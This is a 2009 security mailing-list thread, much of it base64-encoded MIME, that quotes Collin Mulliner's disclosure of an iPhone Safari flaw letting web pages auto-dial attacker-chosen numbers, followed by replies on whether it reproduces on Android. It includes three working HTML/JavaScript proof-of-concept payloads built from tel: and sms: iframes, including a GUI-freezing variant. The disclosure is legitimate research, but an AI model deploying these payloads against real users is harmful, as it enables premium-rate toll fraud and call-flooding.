biBwaG9uZSBudW1iZXIgaXMgY2hvc2VuIGJ5IHRoZSBhdHRhY2tlci4NCj4NCj5SaXNrOiBNRURJ
VU0tSElHSA0KPiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBv
ZiBmaW5hbmNpYWwgZ2FpbiB0aHJvdWdoDQo+ICAgdGhpcyBhdHRhY2sgYnkgY2FsbGluZyBvZiBw
cmVtaXVtIHJhdGUgbnVtYmVycyAoZS5nLiAxLTkwMCBpbiB0aGUNCj4gICBVLlMuKS4gRGVuaWFs
LW9mLXNlcnZpY2UgYWdhaW5zdCBhcmJpdHJhcnkgcGhvbmUgbnVtYmVycyB0aHJvdWdoDQo+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4NCj4tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlJlcG9ydGVyOiBDb2xsaW4gTXVsbGluZXIgPGNvbGxp
bltBVF1tdWxsaW5lci5vcmc+DQo+DQo+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4N
Cj5BZmZpbGlhdGlvbjogTVVsbGlORVIuT1JHIC8gdGhlIHRyaWZpbml0ZSBncm91cCAvIChGcmF1
bmhvZmVyIFNJVCkNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlRpbWUg
bGluZToNCj4NCj4gICBPY3QuIDIwLiAyMDA4OiBSZXBvcnRlZCB2dWxuZXJhYmlsaXR5IHRvIHZl
bmRvci4NCj4gICBPY3QuIDIwLiAyMDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBv
dXIgZW1haWwuDQo+ICAgICAgICAgICAgICAgICAgTm90IGNvbW1lbnRpbmcgb24gdGhlIHZ1bG5l
cmFiaWxpdHkgaXRzZWxmLg0KPiAgIE9jdC4gMjcuIDIwMDg6IFNlbnQgdXBkYXRlIHRvIHZlbmRv
ciwgYWxzbyByZXF1ZXN0aW5nIGEgc3RhdHVzIHJlcG9ydC4NCj4gICBPY3QuIDI5LiAyMDA4OiBS
ZXBseSBmcm9tIHZlbmRvciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPiAgIE9j
dC4gMzAuIDIwMDg6IFNlbnQgYWRkaXRpb25hbCBpbmZvcm1hdGlvbi4NCj4gICBOb3YuIDEzLiAy
MDA4OiBWZW5kZXIgc2F5cyB2dWxuZXJhYmlsaXR5IGlzIGZpeGVkIGluIHVwY29taW5nIE9TDQo+
ICAgICAgICAgICAgICAgICAgdmVyc2lvbi4NCj4gICBOb3YuIDIwLiAyMDA4OiBQdWJsaWMgZGlz
Y2xvc3VyZS4NCj4gICBKdW4uIDE4LiAyMDA5OiBGdWxsLURpc2Nsb3N1cmUuDQo+DQo+LS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5GaXg6DQo+DQo+ICAgaVBob25lIE9TIDIuMg0K
PiAgIGlQaG9uZSBPUyAyLjIuMQ0KPiAgIGlQaG9uZSBPUyAzLjANCj4JDQo+LS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5UZWNobmljYWwgRGV0YWlsczoNCj4NCj4gICBUaGUgU2Fm
YXJpIHZlcnNpb24gcnVubmluZyBvbiB0aGUgaVBob25lIHN1cHBvcnRzIGhhbmRsaW5nIHRoZSBU
RUwgWzFdDQo+ICAgcHJvdG9jb2wgdGhyb3VnaCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFs
ZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4gICBkb25lIGJ5IHBhc3NpbmcgdGhlIHByb3ZpZGVk
IHBob25lIG51bWJlciB0byB0aGUgdGVsZXBob255DQo+ICAgYXBwbGljYXRpb24uIFVuZGVyIG5v
cm1hbCBjb25kaXRpb25zLCBsb2FkaW5nIGEgdGVsOiBVUkkgcmVzdWx0cyBpbiBhDQo+ICAgbWVz
c2FnZSBib3ggYXNraW5nIHRoZSB1c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBu
dW1iZXIuIFRoZQ0KPiAgIHVzZXIgaXMgcHJlc2VudGVkIHdpdGggdGhlIHNpbXBsZSBjaG9pY2Ug
dG8gZWl0aGVyIHByZXNzIGNhbGwgb3INCj4gICBjYW5jZWwuDQo+DQo+ICAgQSBURUwgVVJJIGNh
biBiZSBvcGVuZWQgYXV0b21hdGljYWxseSBpZiB0aGUgVEVMIFVSSSBpcyB1c2VkIGFzIHRoZQ0K
PiAgIHNvdXJjZSBvZiBhbiBIVE1MIGlmcmFtZSBvciBmcmFtZSwgYXMgdGhlIFVSTCBvZiBhIG1l
dGEgcmVmcmVzaCwgYXMNCj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwg
YW5kIGFzIHRoZSBsb2NhdGlvbiBvZiB0aGUNCj4gICBjdXJyZW50IG9yIGEgbmV3IHdpbmRvdyB1
c2luZyBqYXZhc2NyaXB0Lg0KPg0KPiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJh
YmlsaXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPiAgIHBlcm1pc3Npb24gdG8gY2Fs
bCIgZGlhbG9nIGluIGEgd2F5IHRoYXQgY2hvb3NlcyB0aGUgImNhbGwiIG9wdGlvbg0KPiAgIHJh
dGhlciB0aGFuIHRoZSAiY2FuY2VsIiBvcHRpb24uDQo+CQ0KPiAgIFRoaXMgY29uZGl0aW9uIG9j
Y3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4gICBTYWZh
cmkgaXMgY2xvc2VkIGJ5IGxhdW5jaGluZyBhbiBleHRlcm5hbCBhcHBsaWNhdGlvbiwgZm9yIGV4
YW1wbGUNCj4gICBsYXVuY2hpbmcgdGhlIFNNUyBhcHBsaWNhdGlvbiAoaW4gb3JkZXIgdG8gaGFu
ZGxlIGEgU01TIFVSSSBbMl0pLiBUaGUNCj4gICBTTVMgYXBwbGljYXRpb24gY2FuIGJlIGxhdW5j
aGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+ICAgc291cmNlIG9mIGFuIGlm
cmFtZS4gVGhpcyBpcyBzaG93biBpbiB0aGUgZmlyc3QgcHJvb2Ytb2YtY29uY2VwdA0KPiAgIGV4
cGxvaXQgYmVsb3cuDQo+CQ0KPiAgIEZ1cnRoZXIgaW52ZXN0aWdhdGlvbiBzaG93ZWQgdGhhdCB0
aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+ICAgbGF1bmNoaW5nIG90aGVyIGFw
cGxpY2F0aW9ucyBzdWNoIGFzOiBNYXBzLCBZb3VUdWJlLCBhbmQgaVR1bmVzLg0KPiAgIExhdW5j
aGluZyB0aGVzZSBhcHBsaWNhdGlvbnMgY2FuIGJlIGFjaGlldmVkIHRocm91Z2ggbG9hZGluZyBz
cGVjaWFsDQo+ICAgVVJMcyB1c2luZyB0aGUgbWV0YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93
biBpbiB0aGUgc2Vjb25kDQo+ICAgcHJvb2Ytb2YtY29uY2VwdCBleHBsb2l0IGJlbG93Lg0KPg0K
PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVk
IHRocm91Z2ggcG9wdXANCj4gICB3aW5kb3dzIChlLmcuIGphdmFzY3JpcHQgYWxlcnQpLiBJbiB0
aGlzIHNpdHVhdGlvbiB0aGUgaW5pdGlhdGluZyBhcHANCj4gICBkb2VzIG5vdCBuZWVkIHRvIGJl
IHRlcm1pYW50ZWQgaW4gb3JkZXIgdG8gYWN0aXZlIHRoZSBjYWxsLg0KPgkNCj4gICBGaW5hbGx5
LCB3ZSBkaXNjb3ZlcmVkIGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0N
Cj4gICBtYWxpY2lvdXMgcGhvbmUgY2FsbHMgdGhhdCBjYW5ub3QgYmUgcHJldmVudGVkIG9yIGNh
bmNlbGVkIGJ5IHRoZQ0KPiAgIHZpY3RpbS4gVGhpcyBidWcgYWxsb3dzIHRoZSBhdHRhY2tlciB0
byBmcmVleiB0aGUgR1VJIChncmFwaGljYWwgdXNlcg0KPiAgIGludGVyZmFjZSkgZm9yIGEgbnVt
YmVyIG9mIHNlY29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+ICAgcHJv
Z3Jlc3NlcyBpbgl0aGUgYmFja2dyb3VuZCBhbmQgY2Fubm90IGJlIHN0b3BwZWQgYnkgdGhlIHZp
Y3RpbSB1c2VyLg0KPiAgIEZyZWV6aW5nIHRoZSBHVUkgaXMgYWNoaWV2ZWQgYnkgcGFzc2luZyBh
ICJ2ZXJ5IGxvbmciIHBob25lIG51bWJlciB0bw0KPiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRo
ZSBTTVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+ICAgc3RhcnRlZCwg
ZnJlZXplcyB0aGUgaVBob25lIEdVSS4gQWxzbyBzd2l0Y2hpbmcgb2ZmIHRoZSBpUGhvbmUgY2Fu
bm90DQo+ICAgYmUgcGVyZm9ybWVkIGZhc3QgZW5vdWdoIGluIG9yZGVyIHRvIHByZXZlbnQgdGhl
IG1hbGljaW91cyBjYWxsLg0KPgkNCj4NCj4gICBbMV0gaHR0cDovL3d3dy5yZmMtZWRpdG9yLm9y
Zy9yZmMvcmZjMzk2Ni50eHQNCj4gICBbMl0gaHR0cDovL3Rvb2xzLmlldGYub3JnL2h0bWwvZHJh
ZnQtYW50dGktZ3NtLXNtcy11cmwtMDQNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LQ0KPg0KPkZ1cnRoZXIgRGlzY3Vzc2lvbjoNCj4NCj4gICBUaGUgZGlhbGluZyBkaWFsb2cgaXMg
Y2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRoZSB1c2VyLCBpbiBtb3N0DQo+ICAgY2Fz
ZXMsIGNhbid0IHByZXNzIGNhbmNlbCBxdWljayBlbm91Z2ggaW4gb3JkZXIgdG8gc3RvcCB0aGUg
aW5pdGlhdGlvbg0KPiAgIG9mIHRoZSBjYWxsLiBPbmNlIHRoZSBleHRlcm5hbCBhcHBsaWNhdGlv
biBpcyBsYXVuY2hlZCwgdGhlIHRlbGVwaG9ueQ0KPiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcg
aW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWluZyB0aGUgY2FsbC4gT25seQ0KPiAgIHRoZSBjYWxs
IGZvcndhcmRpbmcgZGlhbG9nIChjb250YWluaW5nIHRoZSAiZGlzbWlzcyIgYnV0dG9uKSBpbmRp
Y2F0ZXMNCj4gICBhIGNhbGwgYmVpbmcgbWFkZS4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLQ0KPg0KPlByb29mLW9mLUNvbmNlcHQgd2l0aCBwbGFpbiBIVE1MIHVzaW5nIHRoZSBT
TVMgYXBwbGljYXRpb246DQo+DQo+ICAgPGh0bWw+DQo+ICAgPGhlYWQ+DQo+ICAgPHRpdGxlPmlQ
aG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGlu
ZXINCj4gICA8L3RpdGxlPg0KPiAgIDwvaGVhZD4NCj4gICA8Ym9keT4NCj4gICA8aWZyYW1lIHNy
Yz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPiAgIDxp
ZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9MTA+PC9pZnJhbWU+
DQo+ICAgPCEtLSBzZWNvbmQgaWZyYW1lIGlzIHRvIGF0dGFjayBxdWljayB1c2VycyB3aG8gbWFu
YWdlIHRvIGNsb3NlIHRoZQ0KPiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8tLT4NCj4gICA8
aWZyYW1lIHNyYz0idGVsOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1l
Pg0KPiAgIDwvYm9keT4NCj4gICA8L2h0bWw+DQo+DQo+UHJvb2Ytb2YtQ29uY2VwdCB1c2luZyBq
YXZhc2NyaXB0IGFuZCB0aGUgTWFwcyBhcHBsaWNhdGlvbjoNCj4NCj4gICA8aHRtbD4NCj4gICA8
aGVhZD4NCj4gICA8dGl0bGU+aVBob25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgRXhwbG9pdCBE
ZW1vIGJ5IENvbGxpbiBNdWxsaW5lcg0KPiAgIDwvdGl0bGU+DQo+ICAgPG1ldGEgaHR0cC1lcXVp
dj0icmVmcmVzaCIgY29udGVudD0iMDsNCj4gICBVUkw9aHR0cDovL21hcHMuZ29vZ2xlLmRlL21h
cHM/cT1yaGVpbnN0cmFzc2UrNzUrZGFybXN0YWR0Ij4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+
DQo+ICAgPHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgZnVuY3Rpb24gYSgpIHsNCj4gICAg
ZG9jdW1lbnQud3JpdGUoIjxpZnJhbWUgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIFdJRFRIPTUw
IA0KPkhFSUdIVD0xMD48L2lmcmFtZT4iKTsNCj4gICB9DQo+ICAgc2V0VGltZW91dCgiYSgpIiwg
MTAwKTsNCj4gICA8L3NjcmlwdD4NCj4gICA8L2JvZHk+DQo+ICAgPC9odG1sPg0KPgkNCj5Qcm9v
Zi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0b3AgdGhl
IG1hbGljaW91cyANCj5waG9uZSBjYWxsOg0KPg0KPiAgIDxodG1sPg0KPiAgIDxoZWFkPg0KPiAg
IDx0aXRsZT5pUGhvbmUgU2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29s
bGluIE11bGxpbmVyDQo+ICAgPC90aXRsZT4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+DQo+ICAg
PHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgbCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0K
PiAgIGZvciAoaSA9IDA7IGkgPCAxMDAwMDsgaSsrKSB7DQo+ICAgICAgICAgICBsID0gbCArICIz
MzQwOTQ4MDM0Mjk4MjMyIjsNCj4gICB9DQo+ICAgbCA9IGwgKyAiXCIgd2lkdGg9MTAgaGVpZ2h0
PTEwPjwvaWZyYW1lPjxpZnJhbWUNCj4gICBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgaGVpZ2h0
PTEwIHdpZHRoPTEwPjwvaWZyYW1lPiI7DQo+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+ICAgPC9z
Y3JpcHQ+DQo+ICAgPC9ib2R5Pg0KPiAgIDwvaHRtbD4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLQ0KPg0KPk1vcmUgRGV0YWlsZWQgSW5mb3JtYXRpb246DQo+DQo+ICBEZW1vIHZp
ZGVvIGF2YWlsYWJsZSBhdDoNCj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9pcGhvbmUvDQo+
DQo+ICBBZHZpc29yaWVzOg0KPiAgIGh0dHA6Ly93d3cubXVsbGluZXIub3JnL3NlY3VyaXR5L2Fk
dmlzb3JpZXMvDQo+DQo+LS0tIEVORCBBRFZJU09SWSAtLS0NCj4NCj4NCj4tLSANCj5Db2xsaW4g
Ui4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+DQo+aW5mby9wZ3A6IGZpbmdlciBj
b2xsaW5AYmV0YXZlcnNpb24ubmV0DQo+SWYgQmlsbCBHYXRlcyBoYWQgYSBuaWNrZWwgZm9yIGV2
ZXJ5IHRpbWUgV2luZG93cyBjcmFzaGVkLi4uIE9oIHdhaXQsIGhlIA0KPmRvZXMhDQo=

------OOQR8OIVASFMLRMIKQ9G04MAIHM98G--



From: Collin Mulliner collin@betaversion.net
Sent: Thu 18. Jun 2009 19:29
Mike,

just getting to the phone dialer is not a bug! That is what the tel: 
protocol is for. All most all mobile phones implement this, every time 
you open a tel: URL you will get to the dialer in some way.

Collin

Mike Ely wrote:
> Confirmed on the T-Mobile G1 email app running OS version 1.5.  Was wondering why my phone stepped on email to dial out when I read this email and then I read the subject line ;)
> 
> FWIW, it didnt actually dial, just loaded the dialer with that number ready.  
> 
> Looks like this is a Webkit bug, not Safari. 
> 
> Collin Mulliner <collin@betaversion.net> wrote:
> 
>> Released since Apple published the iPhone 3.0 security fixes.
>>
>> Vulnerability Report
>>
>> --- BEGIN ADVISORY ---
>>
>> Manufacturer: Apple (www.apple.com)
>> Device:       iPhone 3G (iPhone 1st Gen)
>> Firmware:     2.1 (possible earlier versions)
>> Device Type:  smart phone
>>
>> Subsystems: Safari (and mobile telephony)
>>
>> -----------------------------
>>
>> Short name:
>>   iPhone Safari phone-auto-dial (vulnerability)
>>
>> Vulnerability class:
>>   application logic bug
>>
>> Executive Summary:
>>   A malicious website can initiate a phone call without the need of user
>>   interaction. The destination phone number is chosen by the attacker.
>>
>> Risk: MEDIUM-HIGH
>>   Medium to high risk due to the possibility of financial gain through
>>   this attack by calling of premium rate numbers (e.g. 1-900 in the
>>   U.S.). Denial-of-service against arbitrary phone numbers through
>>   mass-calling. User cannot prevent attack.
>>
>> -----------------------------
>>
>> Reporter: Collin Mulliner <collin[AT]mulliner.org>
>>
>> -----------------------------
>>
>> Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT)
>>
>> -----------------------------
>>
>> Time line:
>>
>>   Oct. 20. 2008: Reported vulnerability to vendor.
>>   Oct. 20. 2008: Vendor acknowledges receiving our email.
>>                  Not commenting on the vulnerability itself.
>>   Oct. 27. 2008: Sent update to vendor, also requesting a status report.
>>   Oct. 29. 2008: Reply from vendor acknowledging the vulnerability.
>>   Oct. 30. 2008: Sent additional information.
>>   Nov. 13. 2008: Vender says vulnerability is fixed in upcoming OS
>>                  version.
>>   Nov. 20. 2008: Public disclosure.
>>   Jun. 18. 2009: Full-Disclosure.
>>
>> -----------------------------
>>
>> Fix:
>>
>>   iPhone OS 2.2
>>   iPhone OS 2.2.1
>>   iPhone OS 3.0
>> 	
>> -----------------------------
>>
>> Technical Details:
>>
>>   The Safari version running on the iPhone supports handling the TEL [1]
>>   protocol through launching the telephony/dialer application. This is
>>   done by passing the provided phone number to the telephony
>>   application. Under normal conditions, loading a tel: URI results in a
>>   message box asking the users permission to call the given number. The
>>   user is presented with the simple choice to either press call or
>>   cancel.
>>
>>   A TEL URI can be opened automatically if the TEL URI is used as the
>>   source of an HTML iframe or frame, as the URL of a meta refresh, as
>>   the location of a HTTP 30X redirect, and as the location of the
>>   current or a new window using javascript.
>>
>>   We discovered a security vulnerability that dismisses the "ask for
>>   permission to call" dialog in a way that chooses the "call" option
>>   rather than the "cancel" option.
>> 	
>>   This condition occurs if a TEL URI is activated at the same time
>>   Safari is closed by launching an external application, for example
>>   launching the SMS application (in order to handle a SMS URI [2]). The
>>   SMS application can be launched through placing a SMS URI as the
>>   source of an iframe. This is shown in the first proof-of-concept
>>   exploit below.
>> 	
>>   Further investigation showed that this behavior can be reproduced by
>>   launching other applications such as: Maps, YouTube, and iTunes.
>>   Launching these applications can be achieved through loading special
>>   URLs using the meta refresh tag. This is shown in the second
>>   proof-of-concept exploit below.
>>
>>   We also discovered that the bug can also be triggered through popup
>>   windows (e.g. javascript alert). In this situation the initiating app
>>   does not need to be termianted in order to active the call.
>> 	
>>   Finally, we discovered a second bug that can be used to perform
>>   malicious phone calls that cannot be prevented or canceled by the
>>   victim. This bug allows the attacker to freez the GUI (graphical user
>>   interface) for a number of seconds. While the GUI is frozen the call
>>   progresses in	the background and cannot be stopped by the victim user.
>>   Freezing the GUI is achieved by passing a "very long" phone number to
>>   the SMS application. The SMS application, immediately after being
>>   started, freezes the iPhone GUI. Also switching off the iPhone cannot
>>   be performed fast enough in order to prevent the malicious call.
>> 	
>>
>>   [1] http://www.rfc-editor.org/rfc/rfc3966.txt
>>   [2] http://tools.ietf.org/html/draft-antti-gsm-sms-url-04
>>
>> -----------------------------
>>
>> Further Discussion:
>>
>>   The dialing dialog is clearly shown to the user also the user, in most
>>   cases, cant press cancel quick enough in order to stop the initiation
>>   of the call. Once the external application is launched, the telephony
>>   application is running in the background performing the call. Only
>>   the call forwarding dialog (containing the "dismiss" button) indicates
>>   a call being made.
>>
>> -----------------------------
>>
>> Proof-of-Concept with plain HTML using the SMS application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <!-- second iframe is to attack quick users who manage to close the
>>        first call-dialog //-->
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   </body>
>>   </html>
>>
>> Proof-of-Concept using javascript and the Maps application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   <meta http-equiv="refresh" content="0;
>>   URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt">
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   function a() {
>>    document.write("<iframe src="tel:+14089748388" WIDTH=50 
>> HEIGHT=10></iframe>");
>>   }
>>   setTimeout("a()", 100);
>>   </script>
>>   </body>
>>   </html>
>> 	
>> Proof-of-Concept attack where the victim user cannot stop the malicious 
>> phone call:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   l = "<iframe src="sms:";
>>   for (i = 0; i < 10000; i++) {
>>           l = l + "3340948034298232";
>>   }
>>   l = l + "" width=10 height=10></iframe><iframe
>>   src="tel:+14089748388" height=10 width=10></iframe>";
>>   document.write(l);
>>   </script>
>>   </body>
>>   </html>
>>
>> -----------------------------
>>
>> More Detailed Information:
>>
>>  Demo video available at:
>>   http://www.mulliner.org/iphone/
>>
>>  Advisories:
>>   http://www.mulliner.org/security/advisories/
>>
>> --- END ADVISORY ---
>>
>>
>> -- 
>> Collin R. Mulliner <collin@betaversion.net>
>> info/pgp: finger collin@betaversion.net
>> If Bill Gates had a nickel for every time Windows crashed... Oh wait, he 
>> does!


-- 
Collin R. Mulliner <collin@betaversion.net>
info/pgp: finger collin@betaversion.net
C gives you enough rope to hang yourself. C++ also gives you the tree 
object to tie it to.


From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 14:07
------OOQ6QVNMQ89GSPKM03TM81BMDDCI85
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

UGVyaGFwcyBub3QgZ2V0dGluZyB0byB0aGUgZGlhbGVyLCBidXQgaGF2aW5nIHRoZSBkaWFsZXIg
bGF1bmNoIGF1dG9tYXRpY2FsbHkganVzdCBmcm9tIHZpZXdpbmcgYW4gZW1haWw/CgpDb2xsaW4g
TXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOgoKPk1pa2UsDQo+DQo+anVz
dCBnZXR0aW5nIHRvIHRoZSBwaG9uZSBkaWFsZXIgaXMgbm90IGEgYnVnISBUaGF0IGlzIHdoYXQg
dGhlIHRlbDogDQo+cHJvdG9jb2wgaXMgZm9yLiBBbGwgbW9zdCBhbGwgbW9iaWxlIHBob25lcyBp
bXBsZW1lbnQgdGhpcywgZXZlcnkgdGltZSANCj55b3Ugb3BlbiBhIHRlbDogVVJMIHlvdSB3aWxs
IGdldCB0byB0aGUgZGlhbGVyIGluIHNvbWUgd2F5Lg0KPg0KPkNvbGxpbg0KPg0KPk1pa2UgRWx5
IHdyb3RlOg0KPj4gQ29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmlu
ZyBPUyB2ZXJzaW9uIDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24g
ZW1haWwgdG8gZGlhbCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQg
dGhlIHN1YmplY3QgbGluZSA7KQ0KPj4gDQo+PiBGV0lXLCBpdCBkaWRuJ3QgYWN0dWFsbHkgZGlh
bCwganVzdCBsb2FkZWQgdGhlIGRpYWxlciB3aXRoIHRoYXQgbnVtYmVyIHJlYWR5LiAgDQo+PiAN
Cj4+IExvb2tzIGxpa2UgdGhpcyBpcyBhIFdlYmtpdCBidWcsIG5vdCBTYWZhcmkuIA0KPj4gDQo+
PiBDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOg0KPj4gDQo+
Pj4gUmVsZWFzZWQgc2luY2UgQXBwbGUgcHVibGlzaGVkIHRoZSBpUGhvbmUgMy4wIHNlY3VyaXR5
IGZpeGVzLg0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBSZXBvcnQNCj4+Pg0KPj4+IC0tLSBCRUdJ
TiBBRFZJU09SWSAtLS0NCj4+Pg0KPj4+IE1hbnVmYWN0dXJlcjogQXBwbGUgKHd3dy5hcHBsZS5j
b20pDQo+Pj4gRGV2aWNlOiAgICAgICBpUGhvbmUgM0cgKGlQaG9uZSAxc3QgR2VuKQ0KPj4+IEZp
cm13YXJlOiAgICAgMi4xIChwb3NzaWJsZSBlYXJsaWVyIHZlcnNpb25zKQ0KPj4+IERldmljZSBU
eXBlOiAgc21hcnQgcGhvbmUNCj4+Pg0KPj4+IFN1YnN5c3RlbXM6IFNhZmFyaSAoYW5kIG1vYmls
ZSB0ZWxlcGhvbnkpDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+
DQo+Pj4gU2hvcnQgbmFtZToNCj4+PiAgIGlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsICh2
dWxuZXJhYmlsaXR5KQ0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBjbGFzczoNCj4+PiAgIGFwcGxp
Y2F0aW9uIGxvZ2ljIGJ1Zw0KPj4+DQo+Pj4gRXhlY3V0aXZlIFN1bW1hcnk6DQo+Pj4gICBBIG1h
bGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwgd2l0aG91dCB0aGUgbmVl
ZCBvZiB1c2VyDQo+Pj4gICBpbnRlcmFjdGlvbi4gVGhlIGRlc3RpbmF0aW9uIHBob25lIG51bWJl
ciBpcyBjaG9zZW4gYnkgdGhlIGF0dGFja2VyLg0KPj4+DQo+Pj4gUmlzazogTUVESVVNLUhJR0gN
Cj4+PiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBvZiBmaW5h
bmNpYWwgZ2FpbiB0aHJvdWdoDQo+Pj4gICB0aGlzIGF0dGFjayBieSBjYWxsaW5nIG9mIHByZW1p
dW0gcmF0ZSBudW1iZXJzIChlLmcuIDEtOTAwIGluIHRoZQ0KPj4+ICAgVS5TLikuIERlbmlhbC1v
Zi1zZXJ2aWNlIGFnYWluc3QgYXJiaXRyYXJ5IHBob25lIG51bWJlcnMgdGhyb3VnaA0KPj4+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4+Pg0KPj4+IC0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBSZXBvcnRlcjogQ29sbGluIE11bGxp
bmVyIDxjb2xsaW5bQVRdbXVsbGluZXIub3JnPg0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEFmZmlsaWF0aW9uOiBNVWxsaU5FUi5PUkcgLyB0aGUgdHJp
ZmluaXRlIGdyb3VwIC8gKEZyYXVuaG9mZXIgU0lUKQ0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IFRpbWUgbGluZToNCj4+Pg0KPj4+ICAgT2N0LiAyMC4g
MjAwODogUmVwb3J0ZWQgdnVsbmVyYWJpbGl0eSB0byB2ZW5kb3IuDQo+Pj4gICBPY3QuIDIwLiAy
MDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBvdXIgZW1haWwuDQo+Pj4gICAgICAg
